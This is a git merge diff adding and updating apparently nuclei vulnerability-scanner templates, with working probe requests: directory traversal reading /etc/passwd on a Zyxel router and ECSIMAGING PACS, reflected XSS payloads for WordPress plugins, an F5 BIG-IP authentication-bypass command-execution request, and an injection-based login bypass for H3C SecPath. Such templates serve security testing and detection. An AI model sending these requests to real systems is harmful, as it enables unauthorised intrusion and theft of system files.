Merge branch 'projectdiscovery:master' into dashboard

.new-additions

@@ -1,10 +1,19 @@
+cves/2018/CVE-2018-19326.yaml
+cves/2020/CVE-2020-36510.yaml
 cves/2022/CVE-2022-1040.yaml
+cves/2022/CVE-2022-1221.yaml
 cves/2022/CVE-2022-29548.yaml
 exposed-panels/privx-panel.yaml
 exposed-panels/umbraco-login.yaml
+exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml
+exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml
 exposures/configs/msmtp-config.yaml
+misconfiguration/unauthorized-h3csecparh-login.yaml
+technologies/cloudflare-nginx-detect.yaml
+technologies/dedecms-detect.yaml
 technologies/ecology-detect.yaml
 technologies/jspxcms-detect.yaml
+vulnerabilities/other/ecsimagingpacs-rce.yaml
 vulnerabilities/wordpress/age-gate-open-redirect.yaml
 vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
 vulnerabilities/wordpress/wp-security-open-redirect.yaml

cves/2010/CVE-2010-2861.yaml

@@ -11,6 +11,8 @@ info:
   classification:
     cve-id: CVE-2010-2861
   remediation: Upgrade to a supported version.
+  metadata:
+    shodan-query: http.component:"Adobe ColdFusion"
   tags: cve,cve2010,coldfusion,lfi,adobe
 
 requests:

cves/2018/CVE-2018-15961.yaml

@@ -13,6 +13,8 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2018-15961
     cwe-id: CWE-434
+  metadata:
+    shodan-query: http.component:"Adobe ColdFusion"
   tags: cve,cve2018,adobe,rce,coldfusion,fileupload
 
 requests:

cves/2018/CVE-2018-19326.yaml

@@ -0,0 +1,37 @@
+id: CVE-2018-19326
+
+info:
+  name: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  description: The vulnerability exists due to path traversal, as demonstrated by reading /etc/passwd. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attack and view arbitrary files.
+  reference:
+    - https://www.exploit-db.com/exploits/45904
+    - https://www.cybersecurity-help.cz/vdb/SB2018120309
+    - https://www.zyxel.com/homepage.shtml
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2018-19326
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    shodan-query: http.html:"VMG1312-B10D"
+  tags: cve,cve2018,zyxel,lfi,modem,router
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/../../../../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"

cves/2020/CVE-2020-36510.yaml

@@ -0,0 +1,40 @@
+id: CVE-2020-36510
+
+info:
+  name: 15Zine < 3.3.0 - Reflected Cross-Site Scripting
+  author: veshraj
+  severity: medium
+  description: |
+    The theme does not sanitise and escape the cbi parameter before outputing it back in the response via the cb_s_a AJAX action, leading to a Reflected Cross-Site Scripting
+  reference:
+    - https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36510
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2020-36510
+    cwe-id: CWE-79
+  metadata:
+    verified: false
+  tags: xss,wordpress,wp-theme,wp,cve,cve2020
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

cves/2022/CVE-2022-1221.yaml

@@ -0,0 +1,37 @@
+id: CVE-2022-1221
+
+info:
+  name: Gwyn's Imagemap Selector <= 0.3.3 - Reflected Cross-Site Scripting
+  author: veshraj
+  severity: medium
+  description: |
+    The plugin does not sanitise and escape some parameters before outputting them back in attributes, leading to a Reflected Cross-Site Scripting.
+  reference:
+    - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221
+  metadata:
+    verified: true
+  tags: xss,wordpress,wp-plugin,wp,cve,cve2022
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script> popup-"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

cves/2022/CVE-2022-1388.yaml

@@ -1,18 +1,18 @@
 id: CVE-2022-1388
 
 info:
-  name: F5 BIG-IP iControl REST Auth Bypass RCE
-  author: dwisiswant0
+  name: F5 BIG-IP iControl - REST Auth Bypass RCE
+  author: dwisiswant0,Ph33r
   severity: critical
   description: |
-    This vulnerability may allow an unauthenticated attacker
+    This F5 BIG-IP vulnerability can allow an unauthenticated attacker
     with network access to the BIG-IP system through the management
-    port and/or self IP addresses to execute arbitrary system commands,
-    create or delete files, or disable services. There is no data plane
-    exposure; this is a control plane issue only.
+    port and/or self IP addresses to execute arbitrary system commands.
   reference:
     - https://twitter.com/GossiTheDog/status/1523566937414193153
+    - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
     - https://support.f5.com/csp/article/K23605346
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.80
@@ -21,7 +21,7 @@ info:
   metadata:
     shodan-query: http.title:"BIG-IP®-+Redirect" +"Server"
     verified: true
-  tags: bigip,cve,cve2022,rce,mirai
+  tags: f5,bigip,cve,cve2022,rce,mirai
 
 variables:
   auth: "admin:"
@@ -37,13 +37,33 @@ requests:
         Content-Type: application/json
 
         {
-          "command": "run",
-          "utilCmdArgs": "-c id"
+             "command": "run",
+             "utilCmdArgs": "-c '{{cmd}}'"
         }
 
+      - |
+        POST /mgmt/tm/util/bash HTTP/1.1
+        Host: localhost
+        Connection: keep-alive, X-F5-Auth-Token
+        X-F5-Auth-Token: a
+        Authorization: Basic {{base64(auth)}}
+        Content-Type: application/json
+
+        {
+             "command": "run",
+             "utilCmdArgs": "-c '{{cmd}}'"
+        }
+
+    payloads:
+      cmd:
+        - 'echo CVE-2022-1388 | rev'
+
+    stop-at-first-match: true
+    matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "commandResult"
-          - "uid="
-        condition: and
+          - "8831-2202-EVC"
+        condition: and

cves/2022/CVE-2022-25323.yaml

@@ -26,7 +26,11 @@ requests:
         part: body
         words:
           - 'back<img src=x onerror=alert(document.domain)>'
-        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
 
       - type: status
         status:

exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml

@@ -0,0 +1,28 @@
+id: zyxel-vmg1312b10d-login
+
+info:
+  name: ZYXEL VMG1312-B10D Login Detect
+  author: princechaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"VMG1312-B10D"
+  tags: tech,zyxel,modem,router
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "VMG1312-B10D"
+          - "Welcome to the Web-Based Configurator"
+        condition: and
+
+      - type: status
+        status:
+          - 401

exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml

@@ -0,0 +1,26 @@
+id: zyxel-vsg1432b101-login
+
+info:
+  name: ZYXEL VSG1432-B101 Login Detect
+  author: princechaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"VSG1432-B101"
+  tags: tech,zyxel,modem,router
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Welcome to ZyXEL VSG1432-B101::"
+
+      - type: status
+        status:
+          - 200

misconfiguration/unauthorized-h3csecparh-login.yaml

@@ -0,0 +1,30 @@
+id: unauthorized-h3csecparh-login
+
+info:
+  name: Unauthorized H3C Secparh Login
+  author: ritikchaddha
+  severity: high
+  metadata:
+    verified: true
+    shodan-query: http.html:"H3C-SecPath-运维审计系统"
+    fofa-query: app="H3C-SecPath-运维审计系统" && body="2018"
+  tags: h3c,default-login,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "admin"
+          - "审计管理员"
+          - "错误的id"
+        condition: and
+
+      - type: status
+        status:
+          - 200

technologies/cloudflare-nginx-detect.yaml

@@ -0,0 +1,28 @@
+id: cloudflare-nginx-detect
+
+info:
+  name: Cloudflare Nginx Detect
+  author: idealphase
+  severity: info
+  reference:
+    - https://blog.cloudflare.com/end-of-the-road-for-cloudflare-nginx/
+  metadata:
+    verified: true
+    shodan-query: product:"cloudflare-nginx"
+  tags: cloudflare,nginx,tech
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "Server: cloudflare-nginx"
+
+      - type: status
+        status:
+          - 200

technologies/dedecms-detect.yaml

@@ -0,0 +1,31 @@
+id: dedecms-detect
+
+info:
+  name: DedeCMS Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"dedecms" || http.html:"power by dedecms"
+  tags: dedecms,tech
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Power by DedeCms"
+          - "DedeCMS演示站"
+          - "DedeCMS"
+        condition: or
+
+      - type: status
+        status:
+          - 200

vulnerabilities/other/ecsimagingpacs-rce.yaml

@@ -0,0 +1,26 @@
+id: ecsimagingpacs-rce
+
+info:
+  name: ECSIMAGING PACS 6.21.5 - Remote code execution
+  author: ritikchaddha
+  severity: critical
+  description: ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter `file` on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access
+  reference: https://www.exploit-db.com/exploits/49388
+  metadata:
+    verified: false
+  tags: ecsimagingpacs,rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/showfile.php?file=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200